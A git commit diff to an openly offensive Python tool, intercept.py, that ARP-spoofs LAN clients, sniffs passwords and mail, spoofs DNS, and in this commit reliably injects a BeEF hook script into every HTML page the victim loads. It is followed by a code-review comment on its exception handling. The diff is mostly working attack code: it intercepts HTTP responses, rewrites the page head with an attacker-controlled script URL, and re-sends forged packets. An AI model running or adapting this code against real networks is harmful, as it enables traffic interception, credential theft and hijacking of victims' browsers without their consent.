beef hooking more reliable
This commit is contained in:
parent
c383dcf4b7
commit
f38236290e
2 changed files with 44 additions and 43 deletions
|
@ -3,7 +3,7 @@ intercept
|
||||||
|
|
||||||
Individually arpspoofs the target box, router and DNS server if necessary. Displays all most the interesting bits of their traffic. Cleans up after itself.
|
Individually arpspoofs the target box, router and DNS server if necessary. Displays all most the interesting bits of their traffic. Cleans up after itself.
|
||||||
|
|
||||||
Prereqs: Linux, scapy, python nfqueue-bindings, aircrack-ng, python twisted
|
Prereqs: Linux, scapy, python nfqueue-bindings, aircrack-ng, python twisted, BeEF (option)
|
||||||
|
|
||||||
Example usage as root:
|
Example usage as root:
|
||||||
python intercept.py -u -p -d -ip 192.168.0.10
|
python intercept.py -u -p -d -ip 192.168.0.10
|
||||||
|
@ -37,6 +37,9 @@ python intercept.py -h
|
||||||
|
|
||||||
-na, performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
|
-na, performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
|
||||||
|
|
||||||
|
-b BEEF_HOOK_URL, copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
Cleans the following on Ctrl-C:
|
Cleans the following on Ctrl-C:
|
||||||
|
|
||||||
|
@ -47,6 +50,7 @@ Cleans the following on Ctrl-C:
|
||||||
individually restore each machine's ARP table
|
individually restore each machine's ARP table
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
To do:
|
To do:
|
||||||
|
|
||||||
Add ability to read from pcap file
|
Add ability to read from pcap file
|
||||||
|
|
81
intercept.py
81
intercept.py
|
@ -1,10 +1,6 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
|
|
||||||
'''
|
'''
|
||||||
Description: MITMs another LAN client and prints all the interesting unencrypted info like passwords and messages. Asynchronous multithreaded arp spoofing packet parser.
|
Description: MITMs another LAN client and prints all the interesting unencrypted info like passwords and messages. Asynchronous multithreaded arp spoofing packet parser.
|
||||||
Author: Dan McInerney
|
|
||||||
Contact: danhmcinerney gmail
|
|
||||||
|
|
||||||
Prerequisites: Linux
|
Prerequisites: Linux
|
||||||
nmap (optional)
|
nmap (optional)
|
||||||
nbtscan (optional)
|
nbtscan (optional)
|
||||||
|
@ -16,6 +12,13 @@ Prerequisites: Linux
|
||||||
|
|
||||||
Note: This script flushes iptables before and after usage.
|
Note: This script flushes iptables before and after usage.
|
||||||
'''
|
'''
|
||||||
|
__author__ = 'Dan McInerney'
|
||||||
|
__license__ = 'GPL'
|
||||||
|
__email__ = 'danhmcinerney with gmail'
|
||||||
|
__version__ = 1.0
|
||||||
|
|
||||||
|
####################################################################
|
||||||
|
|
||||||
|
|
||||||
import logging
|
import logging
|
||||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
|
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
|
||||||
|
@ -103,7 +106,7 @@ class Parser():
|
||||||
catch_pkts = 0
|
catch_pkts = 0
|
||||||
full_pkt = ''
|
full_pkt = ''
|
||||||
full_load = ''
|
full_load = ''
|
||||||
drop_load = []
|
drop_body = []
|
||||||
start_time = 0
|
start_time = 0
|
||||||
|
|
||||||
def start(self, payload):
|
def start(self, payload):
|
||||||
|
@ -123,14 +126,6 @@ class Parser():
|
||||||
sport = pkt[TCP].sport
|
sport = pkt[TCP].sport
|
||||||
ack = pkt[TCP].ack
|
ack = pkt[TCP].ack
|
||||||
load = pkt[Raw].load
|
load = pkt[Raw].load
|
||||||
#################################################
|
|
||||||
if sport == 80:
|
|
||||||
# for x in self.drop_load:
|
|
||||||
# if load == x:
|
|
||||||
# payload.set_verdict(nfqueue.NF_DROP)
|
|
||||||
# return
|
|
||||||
self.beef(load, ack, pkt, payload)
|
|
||||||
#################################################
|
|
||||||
mail_ports = [25, 26, 110, 143]
|
mail_ports = [25, 26, 110, 143]
|
||||||
if dport in mail_ports or sport in mail_ports:
|
if dport in mail_ports or sport in mail_ports:
|
||||||
self.mailspy(load, dport, sport, IP_dst, IP_src, mail_ports, ack)
|
self.mailspy(load, dport, sport, IP_dst, IP_src, mail_ports, ack)
|
||||||
|
@ -140,6 +135,8 @@ class Parser():
|
||||||
self.ftp(load, IP_dst, IP_src)
|
self.ftp(load, IP_dst, IP_src)
|
||||||
if dport == 80 or sport == 80:
|
if dport == 80 or sport == 80:
|
||||||
self.URL(load, ack, dport, sport)
|
self.URL(load, ack, dport, sport)
|
||||||
|
if sport == 80 and args.beef:
|
||||||
|
self.beef(load, ack, pkt, payload)
|
||||||
if args.dnsspoof:
|
if args.dnsspoof:
|
||||||
if pkt.haslayer(DNSQR):
|
if pkt.haslayer(DNSQR):
|
||||||
dport = pkt[UDP].dport
|
dport = pkt[UDP].dport
|
||||||
|
@ -149,36 +146,38 @@ class Parser():
|
||||||
dns_layer = pkt[DNS]
|
dns_layer = pkt[DNS]
|
||||||
self.dnsspoof(dns_layer, IP_src, IP_dst, sport, dport, localIP, payload)
|
self.dnsspoof(dns_layer, IP_src, IP_dst, sport, dport, localIP, payload)
|
||||||
|
|
||||||
#################################################
|
|
||||||
def beef(self, load, ack, pkt, payload):
|
def beef(self, load, ack, pkt, payload):
|
||||||
current_time = time.time()
|
heads = 0
|
||||||
############### Maybe test the next packet for having headers. If it does, then block it and inject?
|
try:
|
||||||
if self.catch_pkts == 1 and current_time > self.start_time + 1:
|
headers, body = load.split("\r\n\r\n", 1)
|
||||||
for x in self.drop_load:
|
heads = 1
|
||||||
if load == x:
|
except:
|
||||||
print '[-] load found in drop_load list'
|
pass
|
||||||
payload.set_verdict(nfqueue.NF_DROP)
|
if self.catch_pkts == 1:
|
||||||
break
|
if heads == 1 or ack != self.oldBEEFack:
|
||||||
self.inject()
|
heads = 0
|
||||||
|
self.catch_pkts = 0
|
||||||
|
self.inject()
|
||||||
if self.catch_pkts == 1 and self.oldBEEFack == ack and self.oldBEEFack != 0:
|
if self.catch_pkts == 1 and self.oldBEEFack == ack and self.oldBEEFack != 0:
|
||||||
self.full_data = self.full_data+load
|
self.full_data = self.full_data+load
|
||||||
print '[+] Added data to the BeEF queue'
|
print '[+] Added data to the BeEF packet'
|
||||||
payload.set_verdict(nfqueue.NF_DROP)
|
payload.set_verdict(nfqueue.NF_DROP)
|
||||||
return
|
return
|
||||||
if 'Content-Type: text/html' in load and self.catch_pkts == 0:
|
if 'Content-Type: text/html' in load and self.catch_pkts == 0:
|
||||||
self.start_time = time.time()
|
|
||||||
print '[+] HTML packet found, starting BeEF queue'
|
print '[+] HTML packet found, starting BeEF queue'
|
||||||
self.drop_load.append(load)
|
|
||||||
self.oldBEEFack = ack
|
self.oldBEEFack = ack
|
||||||
self.full_pkt = pkt
|
self.full_pkt = pkt
|
||||||
self.full_data = load
|
self.full_data = load
|
||||||
self.server = pkt[IP].src
|
self.server = pkt[IP].src
|
||||||
self.catch_pkts = 1
|
self.catch_pkts = 1
|
||||||
payload.set_verdict(nfqueue.NF_DROP)
|
payload.set_verdict(nfqueue.NF_DROP)
|
||||||
return
|
|
||||||
|
|
||||||
def inject(self):
|
def inject(self):
|
||||||
url = '<script src='+args.beef+'></script> '
|
|
||||||
|
html = '<script src='+args.beef+'></script> '
|
||||||
|
|
||||||
|
body_found = 0
|
||||||
|
|
||||||
if self.full_pkt != '' and self.full_data != '':
|
if self.full_pkt != '' and self.full_data != '':
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
@ -197,27 +196,30 @@ class Parser():
|
||||||
print '[-] Could not decompress body of packet'
|
print '[-] Could not decompress body of packet'
|
||||||
self.full_data = ''
|
self.full_data = ''
|
||||||
self.full_pkt = ''
|
self.full_pkt = ''
|
||||||
self.catch_pkts = 0
|
|
||||||
self.oldBEEFack = 0
|
self.oldBEEFack = 0
|
||||||
return
|
return
|
||||||
|
|
||||||
if '<html' in body:
|
if '<html' in body or '/html>' in body:
|
||||||
psplit = str(body).split('<head>')
|
|
||||||
try:
|
try:
|
||||||
body = psplit[0]+'<head> '+url+psplit[1]
|
psplit = str(body).split('</head>')
|
||||||
|
body = psplit[0]+html+'</head>'+psplit[1]
|
||||||
except:
|
except:
|
||||||
print '[-] <head> not found in load'
|
print '[-] </head> not found in load'
|
||||||
try:
|
try:
|
||||||
psplit = str(body).split('</head>')
|
psplit = str(body).split('<head>')
|
||||||
body = psplit[0]+url+'</head>'+psplit[1]
|
body = psplit[0]+'<head>'+html+psplit[1]
|
||||||
except:
|
except:
|
||||||
print '[-] </head> not found in load'
|
print '[-] Failed to inject html'
|
||||||
self.full_data = ''
|
self.full_data = ''
|
||||||
self.full_pkt = ''
|
self.full_pkt = ''
|
||||||
self.catch_pkts = 0
|
|
||||||
self.oldBEEFack = 0
|
self.oldBEEFack = 0
|
||||||
return
|
return
|
||||||
|
|
||||||
|
# For debugging
|
||||||
|
# fp = open(str(self.oldBEEFack)+'.html', 'wb')
|
||||||
|
# fp.write(headers+"\r\n\r\n"+body)
|
||||||
|
# fp.close
|
||||||
|
|
||||||
# Recompress data if necessary
|
# Recompress data if necessary
|
||||||
if 'Content-Encoding: gzip' in headers:
|
if 'Content-Encoding: gzip' in headers:
|
||||||
try:
|
try:
|
||||||
|
@ -229,7 +231,6 @@ class Parser():
|
||||||
except:
|
except:
|
||||||
self.full_data = ''
|
self.full_data = ''
|
||||||
self.full_pkt = ''
|
self.full_pkt = ''
|
||||||
self.catch_pkts = 0
|
|
||||||
self.oldBEEFack = 0
|
self.oldBEEFack = 0
|
||||||
print '[-] Could not recompress html'
|
print '[-] Could not recompress html'
|
||||||
|
|
||||||
|
@ -239,7 +240,6 @@ class Parser():
|
||||||
print '[-] Could not split headers at Content-Length\n'
|
print '[-] Could not split headers at Content-Length\n'
|
||||||
self.full_data = ''
|
self.full_data = ''
|
||||||
self.full_pkt = ''
|
self.full_pkt = ''
|
||||||
self.catch_pkts = 0
|
|
||||||
self.oldBEEFack = 0
|
self.oldBEEFack = 0
|
||||||
return
|
return
|
||||||
httpnewlength = str(len(headers+"\r\n\r\n"+body))
|
httpnewlength = str(len(headers+"\r\n\r\n"+body))
|
||||||
|
@ -250,14 +250,11 @@ class Parser():
|
||||||
del self.full_pkt[IP].chksum
|
del self.full_pkt[IP].chksum
|
||||||
del self.full_pkt[TCP].chksum
|
del self.full_pkt[TCP].chksum
|
||||||
|
|
||||||
catch_pkts = 0
|
|
||||||
send(self.full_pkt)
|
send(self.full_pkt)
|
||||||
print '[!] Sent injected packet'
|
print '[!] Sent injected packet'
|
||||||
self.full_data = ''
|
self.full_data = ''
|
||||||
self.full_pkt = ''
|
self.full_pkt = ''
|
||||||
self.catch_pkts = 0
|
|
||||||
self.oldBEEFack = 0
|
self.oldBEEFack = 0
|
||||||
#################################################
|
|
||||||
|
|
||||||
# Spoof DNS for a specific domain to point to your machine
|
# Spoof DNS for a specific domain to point to your machine
|
||||||
def dnsspoof(self, dns_layer, IP_src, IP_dst, sport, dport, localIP, payload):
|
def dnsspoof(self, dns_layer, IP_src, IP_dst, sport, dport, localIP, payload):
|
||||||
|
|
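Review bot: The new guard in beef() (hunk @ -149,36 +146,38), `try: headers, body = load.split("\r\n\r\n", 1)` / `heads = 1` / `except: pass`, uses a bare except, so it also silences AttributeError and any other unexpected error on `load` rather than only the case it is written for; the failure this guard handles is the one-element unpack when no header terminator is present, so it should read `except ValueError: pass`. The same hunk adds `body_found = 0` at the top of inject(), and the earlier hunk @ -103,7 +106,7 renames the class attribute to `drop_body = []`, yet neither name is referenced anywhere in the hunks shown now that the `for x in self.drop_load` loop is deleted — if they are unused elsewhere in the file too, they are dead state and should be removed. The bare `except:` blocks that already existed around the `</head>` / `<head>` split in inject() remain as broad as before, which the commit does not address. inject() continues past this hunk and ends in the final hunk of the section.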